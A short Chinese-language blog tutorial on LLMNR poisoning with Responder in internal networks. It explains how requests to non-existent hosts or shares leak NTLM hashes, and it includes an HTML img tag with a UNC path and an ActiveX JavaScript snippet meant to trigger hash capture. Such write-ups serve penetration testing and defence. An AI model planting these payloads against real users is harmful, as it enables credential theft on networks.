LLMNR Poison内网攻击技术


LLMNR Poison内网攻击技术


攻击者在启动 Responder 后,当受害者去访问一个在当前局域网中不存在的主机时就会触发 LLMNR Poison 攻击,如下图所示:

受害者主机 PING 一台局域网中并不存在的主机。Responder 会响应 LLMNR 的广播包并进行了 Poison 攻击。在受害者的主机中 NetBIOS 缓存中已经加入了被 Poison 攻击的主机 IP 记录。

受害者访问一个不存在的主机的共享。这样可以获得受害者主机的 HASH 。

在html页面中插入不存在的共享,也可获取主机hash。

html页面内容如下:

<img/src=\\TEST\1.jpg width=0 height=0>

或者使用js文件,内容如下:

var fso = new ActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//ABC/aa")


文章作者: Danie1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Danie1 !
 上一篇
红蓝对抗之Linux内网渗透 红蓝对抗之Linux内网渗透
红蓝对抗之Linux内网渗透 隧道 Linux上可以利用自带和第三方工具进行隧道开启,利用隧道,我们可以建立Socks连接、端口转发等操作。 SSH Linux使用SSH常用的开启隧道的命令。 场景1:在控制A机器时,利用socks代
2020-12-27
下一篇 
emlog 6.0.0审计 emlog 6.0.0审计
emlog 6.0.0审计 后台删除评论sql注入admin/comment.php 当action为delbyip时,判断token,并且GET传入的ip地址未经过滤带入delcommentbyip方法。跟踪该方法。定义在include
2020-08-29
  目录